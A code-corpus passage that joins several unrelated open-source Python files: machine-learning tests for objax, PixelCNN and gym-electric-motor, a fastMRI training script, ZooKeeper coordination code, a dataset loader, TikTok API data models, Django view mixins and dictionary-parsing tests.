objax.optimizer.Momentum(model.vars(), nesterov=True) # Predict op predict_op = lambda x: objax.functional.softmax(model(x, training=False)) self.assertDictEqual(objax.util.find_used_variables(predict_op), model.vars(scope='model.')) # Loss function def loss(x, label): logit = model(x, training=True) xe_loss = objax.functional.loss.cross_entropy_logits_sparse(logit, label).mean() return xe_loss self.assertDictEqual(objax.util.find_used_variables(loss), model.vars(scope='model.')) # Gradients and loss function loss_gv = objax.GradValues(loss, objax.util.find_used_variables(loss)) def train_op(x, y, learning_rate): grads, loss = loss_gv(x, y) opt(learning_rate, grads) return loss self.assertDictEqual(objax.util.find_used_variables(train_op), {**model.vars(scope='loss_gv.model.'), **opt.vars(scope='opt.')}) def test_lambda_inside_function(self): m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)]) def loss(x): get_logits = lambda inp: m(inp, training=True) return jn.sum(get_logits(x)) vc = objax.util.find_used_variables(loss) self.assertDictEqual(vc, m.vars(scope='m.')) if __name__ == '__main__': unittest.main()
tests/test_physical_systems/test_physical_systems.py
RaviPandey33/gym-electric-motor-1
179
12749321
import numpy as np from ..testing_utils import DummyConverter, DummyLoad, DummyNoise, DummyOdeSolver, DummyVoltageSupply, DummyElectricMotor,\ mock_instantiate, instantiate_dict from gym_electric_motor.physical_systems import physical_systems as ps, converters as cv, electric_motors as em,\ mechanical_loads as ml, voltage_supplies as vs, solvers as sv from gym.spaces import Box import pytest class TestSCMLSystem: """ Base Class to test all PhysicalSystems that derive from SCMLSystem """ class_to_test = ps.SCMLSystem def mock_build_state(self, motor_state, torque, u_in, u_sup): """Function to mock an arbitrary build_state function to test the SCMLSystem """ self.motor_state = motor_state self.torque = torque self.u_in = u_in self.u_sup = u_sup return np.concatenate(( self.motor_state[:len(DummyLoad.state_names)], [torque], self.motor_state[len(DummyLoad.state_names):], [u_sup] )) @pytest.fixture def scml_system(self, monkeypatch): """ Returns an instantiated SCMLSystem with Dummy Components and mocked abstract functions """ monkeypatch.setattr( self.class_to_test, '_build_state_names', lambda _: DummyLoad.state_names + ['torque'] + DummyElectricMotor.CURRENTS + DummyElectricMotor.VOLTAGES + ['u_sup'] ) monkeypatch.setattr( self.class_to_test, '_build_state_space', lambda _, state_names: Box( low=np.zeros_like(state_names, dtype=float), high=np.zeros_like(state_names, dtype=float) ) ) return self.class_to_test( converter=DummyConverter(), motor=DummyElectricMotor(), load=DummyLoad(), supply=DummyVoltageSupply(), ode_solver=DummyOdeSolver(), noise_generator=DummyNoise() ) def test_reset(self, scml_system): """Test the reset function in the physical system""" scml_system._t = 12 scml_system._k = 33 state_space = scml_system.state_space state_positions = scml_system.state_positions initial_state = scml_system.reset() target = (np.array([0, 0, 0, 0, 0, 0, 560]) + scml_system._noise_generator.reset()) / scml_system.limits assert np.all(initial_state == target), 'Initial states of the system are incorrect' assert scml_system._t == 0, 'Time of the system was not set to zero after reset' assert scml_system._k == 0, 'Episode step of the system was not set to zero after reset' assert scml_system.converter.reset_counter == scml_system.electrical_motor.reset_counter \ == scml_system.mechanical_load.reset_counter == scml_system.supply.reset_counter,\ 'The reset was not passed to all components of the SCMLSystem' assert scml_system._ode_solver.t == 0, 'The ode solver was not reset correctly' assert all(scml_system._ode_solver.y == np.zeros_like( scml_system.mechanical_load.state_names + scml_system.electrical_motor.CURRENTS, dtype=float )), ' The ode solver was not reset correctly' def test_system_equation(self, scml_system): """Tests the system equation function""" state = np.random.rand(4) currents = state[[2, 3]] torque = scml_system.electrical_motor.torque(currents) u_in = np.random.rand(2) t = np.random.rand() derivative = scml_system._system_equation(t, state, u_in) assert all( derivative == np.array([torque, -torque, currents[0] - u_in[0], currents[1] - u_in[1]]) ), 'The system equation return differs from the expected' assert scml_system.mechanical_load.t == t, 'The time t was not passed through to the mech. load equation' assert np.all(scml_system.mechanical_load.mechanical_state == state[:2]),\ 'The mech. state was not returned correctly' def test_simulate(self, scml_system): """Test the simulation function of the SCMLSystem""" # Reset the system and take a random action scml_system.reset() action = scml_system.action_space.sample() # Set a defined intitial state ode_state = np.array([3, 4, 5, 6]) scml_system._ode_solver.set_initial_value(ode_state) # Perform the action on the system next_state = scml_system.simulate(action) solver_state_me = scml_system._ode_solver.y[:len(DummyLoad.state_names)] solver_state_el = scml_system._ode_solver.y[len(DummyLoad.state_names):] torque = [scml_system.electrical_motor.torque(solver_state_el)] u_sup = [scml_system.supply.u_nominal] u_in = [u * u_sup[0] for u in scml_system.converter.u_in] # Calculate the next state desired_next_state = ( np.concatenate((solver_state_me, torque, solver_state_el, u_in, u_sup)) + scml_system._noise_generator.noise() ) / scml_system.limits # Assertions for correct simulation assert all(desired_next_state == next_state), 'The calculated next state differs from the expected one' assert scml_system.converter.action == action, 'The action was not passed correctly to the converter' assert scml_system.converter.action_set_time == 0, 'The action start time was passed incorrect to the converter' assert scml_system.converter.last_i_out == scml_system.electrical_motor.i_in(scml_system._ode_solver.last_y[2:]) def test_system_jacobian(self, scml_system): """Tests for the system jacobian function""" el_jac = np.arange(4).reshape(2, 2) el_over_omega = np.arange(4, 6) torque_over_el = np.arange(6, 8) # Set the el. jacobian returns to specified values scml_system.electrical_motor.electrical_jac_return = (el_jac, el_over_omega, torque_over_el) me_jac = np.arange(8, 12).reshape(2, 2) me_over_torque = np.arange(12, 14) # Set the mech. jabobian returns to specified values scml_system.mechanical_load.mechanical_jac_return = me_jac, me_over_torque sys_jac = scml_system._system_jacobian(0, np.array([0, 1, 2, 3]), [0, -1]) # assert np.all(sys_jac[-2:, -2:] == el_jac), 'The el. jacobian is false' assert np.all(sys_jac[:2, :2] == me_jac), 'The mech. jacobian is false' assert np.all(sys_jac[2:, 0] == el_over_omega), 'the derivative of the el.state over omega is false' assert np.all(sys_jac[2:, 1] == np.zeros(2)) assert np.all(sys_jac[:-2, 2:] == np.array([[72, 84], [78, 91]])), 'The derivative of the mech.state ' \ 'over the currents is false'
fastmri_recon/training_scripts/single_coil/kikinet_sep_approach_af4_oasis.py
samiulshuvo/fastmri-reproducible-benchmark
105
12749329
import os.path as op import random import time from keras.callbacks import TensorBoard, ModelCheckpoint, LearningRateScheduler import tensorflow as tf from tensorflow_addons.callbacks import TQDMProgressBar from fastmri_recon.data.sequences.oasis_sequences import Masked2DSequence, KIKISequence from fastmri_recon.models.functional_models.kiki_sep import kiki_sep_net from fastmri_recon.models.utils.data_consistency import MultiplyScalar from fastmri_recon.models.utils.non_linearities import lrelu random.seed(0) # paths train_path = '/media/Zaccharie/UHRes/OASIS_data/' n_train = 1000 n_val = 200 # generators AF = 4 train_gen_last = Masked2DSequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, seed=0, val_split=0.1) val_gen_last = train_gen_last.val_sequence train_gen_last.filenames = random.sample(train_gen_last.filenames, n_train) val_gen_last.filenames = random.sample(val_gen_last.filenames, n_val) random.seed(0) train_gen_i = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='I', seed=0, val_split=0.1) val_gen_i = train_gen_i.val_sequence train_gen_i.filenames = random.sample(train_gen_i.filenames, n_train) val_gen_i.filenames = random.sample(val_gen_i.filenames, n_val) random.seed(0) train_gen_k = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='K', seed=0, val_split=0.1) val_gen_k = train_gen_k.val_sequence train_gen_k.filenames = random.sample(train_gen_k.filenames, n_train) val_gen_k.filenames = random.sample(val_gen_k.filenames, n_val) random.seed(0) run_params = { 'n_convs': 16, 'n_filters': 48, 'noiseless': True, 'lr': 1e-3, 'activation': lrelu, 'input_size': (None, None, 1), } multiply_scalar = MultiplyScalar() n_epochs = 50 def learning_rate_from_epoch(epoch): return 10**(-(epoch // (n_epochs/3)) - 3) def train_model(model, space='K', n=1): print(model.summary(line_length=150)) run_id = f'kikinet_sep_{space}{n}_af{AF}_oasis_{int(time.time())}' chkpt_path = f'checkpoints/{run_id}' + '-{epoch:02d}.hdf5' print(run_id) chkpt_cback = ModelCheckpoint(chkpt_path, period=n_epochs//2) log_dir = op.join('logs', run_id) tboard_cback = TensorBoard( profile_batch=0, log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=False, ) lrate_cback = LearningRateScheduler(learning_rate_from_epoch) tqdm_cb = TQDMProgressBar() if space == 'K': train_gen = train_gen_k val_gen = val_gen_k elif space == 'I': if n == 2: train_gen = train_gen_last val_gen = val_gen_last elif n == 1: train_gen = train_gen_i val_gen = val_gen_i model.fit_generator( train_gen, steps_per_epoch=n_train, epochs=n_epochs, validation_data=val_gen, validation_steps=1, verbose=0, callbacks=[tqdm_cb, tboard_cback, chkpt_cback, lrate_cback,], # max_queue_size=35, use_multiprocessing=True, workers=35, shuffle=True, ) return model # first K net training model = kiki_sep_net(None, multiply_scalar, to_add='K', last=False, **run_params) train_model(model, space='K', n=1) model = kiki_sep_net(model, multiply_scalar, to_add='I', last=False, **run_params) train_model(model, space='I', n=1) model = kiki_sep_net(model, multiply_scalar, to_add='K', last=False, **run_params) train_model(model, space='K', n=2) model = kiki_sep_net(model, multiply_scalar, to_add='I', last=True, fastmri=False, **run_params) train_model(model, space='I', n=2)
ochopod/core/core.py
autodesk-cloud/ochopod
139
12749350
# # Copyright (c) 2015 Autodesk Inc. # All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import json import logging import ochopod import pykka import time import uuid from flask import Flask, request from kazoo.exceptions import ConnectionClosedError, NodeExistsError from kazoo.client import KazooClient, KazooState from kazoo.recipe.lock import LockTimeout from ochopod.core.fsm import shutdown, spin_lock, Aborted, FSM from pykka import ThreadingFuture, Timeout from threading import Event #: Our ochopod logger logger = logging.getLogger('ochopod') #: Root zookeeper node path (under which we store the pod data for each cluster). This path will prefix any node #: we read or write (including the lock). ROOT = '/ochopod/clusters' #: We use the same tick for all our state-machines (namely one second). This quantity can be scaled up or #: down depending on the actor SAMPLING = 1.0 class ZK(FSM): """ Base layer dealing with zookeeper and in charge of writing the pod ephemeral node upon connection. The reset() state will by default loop back to initial() and properly de-allocate the kazoo driver. Once connected the machine will spin() until we raise something. Please note we support an explicit reset request which will trip the machine. This is used from the CLI to force a pod to completely disconnect/reconnect/reconfigure. """ def __init__(self, brokers, scope, tag, breadcrumbs, hints): super(ZK, self).__init__() self.breadcrumbs = breadcrumbs self.connected = 0 self.brokers = brokers self.force_reset = 0 self.hints = hints self.hints['state'] = 'follower' self.id = uuid.uuid4() self.prefix = '%s/%s.%s' % (ROOT, scope, tag) self.scope = scope self.seq = None self.tag = tag def feedback(self, state): # # - forward the state change to the actor via a message # - the specialized() hook will process this safely # self.actor_ref.tell( { 'request': 'state change', 'state': state }) def reset(self, data): self.connected = 0 self.force_reset = 0 self.hints['state'] = 'follower' logger.warning('%s : actor reset (%s)' % (self.path, data.cause)) if hasattr(data, 'zk'): # # - gracefully shut our client down # data.zk.stop() logger.debug('%s : zk client stopped, releasing resources' % self.path) data.zk.close() if self.terminate: super(ZK, self).reset(data) return 'initial', data, 0 def initial(self, data): # # - setup a new kazoo client # cnx_string = ','.join(self.brokers) logger.debug('%s : connecting @ %s' % (self.path, cnx_string)) data.zk = KazooClient(hosts=cnx_string, timeout=5.0, read_only=0, randomize_hosts=1) data.zk.add_listener(self.feedback) data.zk.start() data.n = 0 return 'wait_for_cnx', data, 0 def wait_for_cnx(self, data): if self.force_reset or self.terminate: raise Aborted('resetting') # # - loop back if we haven't received a CONNECTED event from the driver # if not self.connected: return 'wait_for_cnx', data, SAMPLING # # - the /pods node holds all our ephemeral per-container data (one container == one child node) # - the /hash node stores the last recorded md5 hash (local pods + dependencies), which we use to # flag any change amongst the pods or their dependencies # data.zk.ensure_path('%s/pods' % self.prefix) data.zk.ensure_path('%s/hash' % self.prefix) try: # # - register ourselves by creating an ephemeral # - this is where we can store arbitrary information (e.g our breadcrumbs) # - we ask for a sequence counter as well which we then keep (e.g in case of connection loss or reset # we guarantee the pod won't get assigned a new index) # - this is *critical* for some use-cases (e.g Kafka where the broker index must remain the same) # path = data.zk.create('%s/pods/%s.' % (self.prefix, self.id), ephemeral=True, sequence=True) tokens = path.split('.') if self.seq is None: self.seq = int(tokens[-1]) self.breadcrumbs['seq'] = self.seq js = json.dumps(self.breadcrumbs) data.zk.set(path, js) except NodeExistsError: # # - if the node is already there we just recovered from a zookeeper connection loss # and /snapshot has not been phased out yet .. this is not an issue, simply pause a bit # to re-attempt later # logger.debug('%s : pod %s is already there (probably a zk reconnect)' % (self.path, self.id)) return 'wait_for_cnx', data, 5.0 * SAMPLING logger.debug('%s : registered as %s (#%d)' % (self.path, self.id, self.seq)) data.connected_at = time.time() return 'spin', data, 0 def spin(self, data): raise NotImplementedError def specialized(self, msg): assert 'request' in msg, 'bogus message received ?' req = msg['request'] if req == 'state change': # # - we got a zk state change # - we only use the switch to CONNECTED to go from wait_for_cnx() to spin() # - ZK disconnects (LOST or SUSPENDED) are simply flagged when exceptions are raised # state = msg['state'] current = 'connected' if self.connected else 'disconnected' logger.debug('%s : zk state change -> "%s" (%s)' % (self.path, str(state), current)) if self.connected and state != KazooState.CONNECTED: logger.warning('%s : lost connection (%s) / forcing a reset' % (self.path, str(state))) self.force_reset = 1 self.connected = 0 elif state == KazooState.CONNECTED: self.connected = 1 elif req == 'reset': # # - we got a request to explicitly force a reset # - this is typically invoked from the CLI # self.force_reset = 1 else: super(ZK, self).specialized(msg) class Coordinator(ZK): """ Leader lock implementation logic, based on :class:`ZK`. The spin() state will attempt to grab a lock (we simply use the Kazoo recipe). If we obtain the lock we boot the controller actor (e.g the clustering model) and then stay there by spin-locking on its latch. If the controller goes down for any reason (typically a zookeeper error or a shutdown request) we'll reset (and disconnect from zookeeper). """ def __init__(self, brokers, scope, tag, port, breadcrumbs, model, hints): super(Coordinator, self).__init__(brokers, scope, tag, breadcrumbs, hints) self.model = model self.path = 'coordinator' self.port = port def reset(self, data): if hasattr(data, 'controller'): # # - don't forget to nuke our controller before resetting # shutdown(data.controller) if hasattr(data, 'lock'): # # - make sure to remove the lock attribute # - it's useless to release the lock as we'll release the client altogether # delattr(data, 'lock') return super(Coordinator, self).reset(data) def spin(self, data): # # - if the termination trigger is set, abort immediately # if self.force_reset or self.terminate: raise Aborted('resetting') # # - attempt to fetch the lock # - allocate it if not already done # - it is *important* to just allocate one lock as there is a leak in kazoo # if not hasattr(data, 'lock'): data.lock = data.zk.Lock('%s/coordinator' % self.prefix) try: # # - attempt to lock within a 5 seconds timeout to avoid stalling in some cases # if data.lock.acquire(timeout=5.0 * SAMPLING): return 'start_controller', data, 0 except LockTimeout: pass return 'spin', data, 0 def start_controller(self, data): # # - if the termination trigger is set, abort immediately # - this is important as it is possible to somehow get the lock after a suspend (acquire() returns # true in that case which is misleading) # if self.force_reset or self.terminate: raise Aborted('resetting') # # - we have the lock (e.g we are the leader) # - start the controller actor # data.latch = ThreadingFuture() logger.debug('%s : lock acquired @ %s, now leading' % (self.path, self.prefix)) data.controller = self.model.start(data.zk, self.id, self.hints, self.scope, self.tag, self.port, data.latch) return 'lock', data, 0 def lock(self, data): # # - if the termination trigger is set, abort immediately # if self.force_reset or self.terminate: raise Aborted('resetting') # # - spin-lock on the controller latch # - any catastrophic plug failure will be trapped that way # try: Event() out = data.latch.get(SAMPLING) if isinstance(out, Exception): raise out except Timeout: pass return 'lock', data, 0
observations/r/bmt.py
hajime9652/observations
199
12749367
<filename>observations/r/bmt.py # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def bmt(path): """data from Section 1.3 The `bmt` data frame has 137 rows and 22 columns. This data frame contains the following columns: group Disease Group 1-ALL, 2-AML Low Risk, 3-AML High Risk t1 Time To Death Or On Study Time t2 Disease Free Survival Time (Time To Relapse, Death Or End Of Study) d1 Death Indicator 1-Dead 0-Alive d2 Relapse Indicator 1-Relapsed, 0-Disease Free d3 Disease Free Survival Indicator 1-Dead Or Relapsed, 0-Alive Disease Free) ta Time To Acute Graft-Versus-Host Disease da Acute GVHD Indicator 1-Developed Acute GVHD 0-Never Developed Acute GVHD) tc Time To Chronic Graft-Versus-Host Disease dc Chronic GVHD Indicator 1-Developed Chronic GVHD 0-Never Developed Chronic GVHD tp Time To Chronic Graft-Versus-Host Disease dp Platelet Recovery Indicator 1-Platelets Returned To Normal, 0-Platelets Never Returned to Normal z1 Patient Age In Years z2 Donor Age In Years z3 Patient Sex: 1-Male, 0-Female z4 Donor Sex: 1-Male, 0-Female z5 Patient CMV Status: 1-CMV Positive, 0-CMV Negative z6 Donor CMV Status: 1-CMV Positive, 0-CMV Negative z7 Waiting Time to Transplant In Days z8 FAB: 1-FAB Grade 4 Or 5 and AML, 0-Otherwise z9 Hospital: 1-The Ohio State University, 2-Alferd , 3-St. Vincent, 4-Hahnemann z10 MTX Used as a Graft-Versus-Host- Prophylactic: 1-Yes 0-No Klein and Moeschberger (1997) *Survival Analysis Techniques for Censored and truncated data*, Springer. Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `bmt.csv`. Returns: Tuple of np.ndarray `x_train` with 137 rows and 22 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'bmt.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/KMsurv/bmt.csv' maybe_download_and_extract(path, url, save_file_name='bmt.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
tiktok_bot/models/post.py
reliefs/tiktok_bot
118
12749384
<filename>tiktok_bot/models/post.py from typing import List, Optional from pydantic import BaseModel from .music import MusicTrack from .request import ( BaseResponseData, CursorOffsetRequestParams, CursorOffsetResponseParams, ListRequestParams, ListResponseData, ) from .user import CommonUserDetails from .video import Video class PostStatistics(BaseModel): # The ID of the post aweme_id: str # The number of comments on the post comment_count: int # The number of times the post has been liked digg_count: int # The number of times the post has been forwarded (looks unused?) forward_count: Optional[int] # The number of times the post has been viewed - doesn't appear to be public, so always 0 play_count: int # The number of times the post has been shared share_count: int class PostStatus(BaseModel): # True if the post allows comments allow_comment: bool # True if the post allows sharing allow_share: bool # 0 if the post can be downloaded download_status: int # True if the post is currently being reviewed in_reviewing: Optional[bool] # True if the post has been deleted is_delete: bool # True if the post is private is_private: bool # True if the post contains content that is not allowed on the platform is_prohibited: Optional[bool] # 0 if the post is public private_status: Optional[int] # 1 if the post has been reviewed reviewed: Optional[int] class PostTags(BaseModel): # 0 if the tag is for a user; 1 if the tag is for a hashtag type: int # The name of the hashtag hashtag_name: Optional[str] # The ID of the tagged user user_id: Optional[str] class RiskInfo(BaseModel): # The text shown if the post has been flagged content: str # ??? risk_sink: bool = False # The risk type associated with the post - 0 if no risk; 1 if low; 2 if high type: int # ??? - only present if the post has been flagged vote: Optional[bool] # True if a warning should be shown to the user warn: bool class ShareInfo(BaseModel): # ??? bool_persist: Optional[int] # The description used when sharing (if set) share_desc: str # The description used when sharing a link only (if set) share_link_desc: Optional[str] # The quote used when sharing (if set) share_quote: Optional[str] # The signature used when sharing (if set) share_signature_desc: Optional[str] # The signature URL used when sharing (if set) share_signature_url: Optional[str] # The title used when sharing share_title: str # The link to share share_url: str # The description used when sharing on Weibo share_weibo_desc: str class StickerInfo(BaseModel): # The ID of the sticker, e.g. 22094 id: str # The display name of the sticker, e.g. Long Face name: str class Post(BaseModel): # Details about the author author: Optional[CommonUserDetails] # The ID of the author author_user_id: str # The ID of the post aweme_id: str # The type of post - 0 for a musical.ly aweme_type: int # The timestamp in seconds when the post was created create_time: int # A description of the post desc: str # Details about the music used in the post music: Optional[MusicTrack] # True if the end user should not be provided the option to download the video prevent_download: Optional[bool] # An age rating for the post, e.g. 12 rate: int # The 2-letter region the post was created in, e.g. US region: str # Risk information about the post risk_infos: Optional[RiskInfo] # Information used when sharing the post share_info: Optional[ShareInfo] # A link to the video on the musical.ly website that is used when sharing share_url: str # Statistics about the post statistics: PostStatistics # Status information about the post status: PostStatus # Information about the sticker used in the post sticker_detail: Optional[StickerInfo] # The ID of the sticker used in the post (looks to be deprecated by sticker_detail) stickers: Optional[str] # Tagged users and hashtags used in the description text_extra: List[PostTags] # 1 if the logged in user has liked this post user_digged: int # Details about the video in the post video: Video @property def video_url(self): url = filter(lambda url: "watermark" in url, self.video.download_addr.url_list) return next(url) @property def video_url_without_watermark(self): return self.video_url.replace("watermark=1", "watermark=0") class GetPostResponse(BaseResponseData): aweme_detail: Post class ListPostsRequest(ListRequestParams, CursorOffsetRequestParams): # The id of the user whose posts to retrieve user_id: str class ListPostsResponse(ListResponseData, CursorOffsetResponseParams): aweme_list: List[Post]
preprocessing/TRStemmer/states/__init__.py
ucekmez/summarizer
205
12749387
from ..transitions import Transition from ..suffixes import * __all__ = ["State"] class State(object): def __init__(self, initialState, finalState, *suffixes): self.initialState = initialState self.finalState = finalState if suffixes is None: self.suffixes = () else: self.suffixes = suffixes def AddTransitions(self, word, transitions, marked): for suffix in self.suffixes: if suffix.Match(word): transitions.append(Transition(self, self.NextState(suffix), word, suffix, marked)) def NextState(self, suffix): raise NotImplementedError("Feature is not implemented.")
examples/pixelcnn/model_test.py
navjotts/flax
2,249
12749392
<gh_stars>1000+ # Copyright 2021 The Flax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Tests for PixelCNN Modules.""" import pixelcnn from flax import linen as nn from absl.testing import absltest from absl.testing import parameterized import numpy.testing as np_testing from jax import random import jax.numpy as np from jax.config import config class ModelTest(absltest.TestCase): def setUp(self): super().setUp() self.rng = random.PRNGKey(0) self.x = np.arange(24).reshape(1, 4, 3, 2) def get_weightnorm(self, params): return [params[k] for k in ('direction', 'scale', 'bias')] def assert_mean_and_variance(self, out): # Weightnorm should ensure that, at initialization time, the outputs of the # module have mean 0 and variance 1 over the non-feature dimensions. np_testing.assert_allclose(np.mean(out, (0, 1, 2)), 0., atol=1e-5) np_testing.assert_allclose(np.var(out, (0, 1, 2)), 1., atol=1e-5) def test_conv(self): model = pixelcnn.ConvWeightNorm(features=4, kernel_size=(3, 2)) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']['weightnorm_params'] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (3, 2, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 2, 2, 4)) self.assert_mean_and_variance(out) def test_conv_down(self): model = pixelcnn.ConvDown(features=4) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']['ConvWeightNorm_0']['weightnorm_params'] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (2, 3, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 4, 3, 4)) self.assert_mean_and_variance(out) def test_conv_down_right(self): model = pixelcnn.ConvDownRight(features=4) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']['ConvWeightNorm_0']['weightnorm_params'] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (2, 2, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 4, 3, 4)) self.assert_mean_and_variance(out) def test_conv_transpose(self): model = pixelcnn.ConvTranspose(features=4, kernel_size = (3, 2)) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']['weightnorm_params'] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (3, 2, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 6, 4, 4)) self.assert_mean_and_variance(out) def test_conv_transpose_down(self): model = pixelcnn.ConvTransposeDown(features=4) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']["ConvWeightNorm_0"]["weightnorm_params"] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (2, 3, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 8, 6, 4)) def test_conv_transpose_down_right(self): model = pixelcnn.ConvTransposeDownRight(features=4) out, variables = model.init_with_output(self.rng, self.x) params = variables['params']['ConvWeightNorm_0']['weightnorm_params'] direction, scale, bias = self.get_weightnorm(params) self.assertEqual(direction.shape, (2, 2, 2, 4)) self.assertEqual(scale.shape, (4,)) self.assertEqual(bias.shape, (4,)) self.assertEqual(out.shape, (1, 8, 6, 4)) def test_pcnn_shape(self): x = random.normal(self.rng, (2, 4, 4, 3)) model = pixelcnn.PixelCNNPP(depth=0, features=2, dropout_p=0) out, _ = model.init_with_output(self.rng, x, train=False) self.assertEqual(out.shape, (2, 4, 4, 100)) if __name__ == '__main__': absltest.main()
mcbv/edit_custom.py
akulakov/django
150
12749429
from copy import copy from django.forms import formsets from django.contrib import messages from django.db.models import Q from django.forms.formsets import formset_factory, BaseFormSet, all_valid from detail import * from edit import * class SearchFormViewMixin(BaseFormView): ignore_get_keys = ("page", ) # TODO this should be ignored in search form? def get_form_kwargs(self): """Returns the keyword arguments for instantiating the form.""" req = self.request kwargs = dict(initial=self.get_initial()) if req.method in ("POST", "PUT"): kwargs.update(dict(data=req.POST, files=req.FILES)) elif req.GET: # do get form processing if there's get data that's not in ignore list get = dict((k,v) for k,v in req.GET.items() if k not in self.ignore_get_keys) if get: kwargs = dict(kwargs, initial=get, data=get) return kwargs def form_get(self, request): form = self.get_form() context = self.get_context_data(form=form) if self.request.GET: if form.is_valid() : context.update(self.form_valid(form)) else : context.update(self.form_invalid(form)) return context class SearchFormView(FormView, SearchFormViewMixin): """FormView for search pages.""" class OwnObjMixin(SingleObjectMixin): """Access object, checking that it belongs to current user.""" item_name = None # used in permissions error message owner_field = "creator" # object's field to compare to current user to check permission def permission_error(self): name = self.item_name or self.object.__class__.__name__ return HttpResponse("You don't have permissions to access this %s." % name) def validate(self, obj): if getattr(obj, self.owner_field) == self.request.user: return True def get_object(self, queryset=None): obj = super(OwnObjMixin, self).get_object(queryset) return obj if self.validate(obj) else None class DeleteOwnObjView(OwnObjMixin, DeleteView): """Delete object, checking that it belongs to current user.""" class UpdateOwnObjView(OwnObjMixin, UpdateView): """Update object, checking that it belongs to current user.""" class UpdateRelatedView(DetailView, UpdateView): """Update object related to detail object; create if does not exist.""" detail_model = None form_model = None fk_attr = None related_name = None def get_modelform_object(self, queryset=None): """ Get related object: detail_model.<related_name> If does not exist, create: form_model.<fk_attr> """ obj = self.get_detail_object() kwargs = {self.fk_attr: obj} try: related_obj = getattr(obj, self.related_name) except self.form_model.DoesNotExist: related_obj = self.form_model.obj.create(**kwargs) setattr(obj, self.related_name, related_obj) return related_obj class SearchEditFormset(SearchFormView): """Search form filtering a formset of items to be updated.""" model = None formset_class = None form_class = None def get_form_class(self): if self.request.method == "GET": return self.form_class else: return self.formset_class def get_queryset(self, form=None): return self.model.objects.filter(self.get_query(form)) def get_query(self, form): """This method should always be overridden, applying search from the `form`.""" return Q() def form_valid(self, form): formset = None if self.request.method == "GET": formset = self.formset_class(queryset=self.get_queryset(form)) else: form.save() messages.success(self.request, "%s(s) were updated successfully" % self.model.__name__.capitalize()) formset = form form = self.form_class(self.request.GET) return self.render_to_response(self.get_context_data(form=form, formset=formset)) def form_invalid(self, form): formset = form form = self.form_class(self.request.GET) return self.render_to_response(self.get_context_data(form=form, formset=formset)) def get(self, request, *args, **kwargs): form = self.get_form() if form.is_bound: if form.is_valid(): return self.form_valid(form) else: return self.form_invalid(form) return self.render_to_response(self.get_context_data(form=form))
tests/dicts/parse/test_parse_util.py
next-franciscoalgaba/python-benedict
365
12749433
<reponame>next-franciscoalgaba/python-benedict<gh_stars>100-1000 # -*- coding: utf-8 -*- from benedict.dicts.parse import parse_util import unittest class parse_util_test_case(unittest.TestCase): def test_parse_bool(self): f = parse_util.parse_bool self.assertTrue(f(1)) self.assertTrue(f(True)) self.assertTrue(f('1')) self.assertTrue(f('True')) self.assertTrue(f('Yes')) self.assertTrue(f('Ok')) self.assertTrue(f('On')) self.assertFalse(f(None)) self.assertFalse(f(0)) self.assertFalse(f(False)) self.assertFalse(f('0')) self.assertFalse(f('False')) self.assertFalse(f('No')) self.assertFalse(f('Ko')) self.assertFalse(f('Off')) def test_parse_date(self): # TODO pass def test_parse_datetime(self): # TODO pass def test_parse_decimal(self): # TODO pass def test_parse_dict(self): # TODO pass def test_parse_float(self): # TODO pass def test_parse_email(self): # TODO pass def test_parse_int(self): # TODO pass def test_parse_list(self): f = lambda value: parse_util.parse_list(value, separator=',') self.assertEqual(f(['0', '1', '2', 'Hello World']), ['0', '1', '2', 'Hello World']) self.assertEqual(f('0,1,2'), ['0', '1', '2']) self.assertEqual(f('0'), ['0']) self.assertEqual(f('1'), ['1']) self.assertEqual(f(''), None) self.assertEqual(f(None), None) def test_parse_list_with_valid_json(self): f = lambda value: parse_util.parse_list(value, separator=None) self.assertEqual(f('[0,1,2,3]'), [0, 1, 2, 3]) def test_parse_list_with_invalid_json_with_separator(self): f = lambda value: 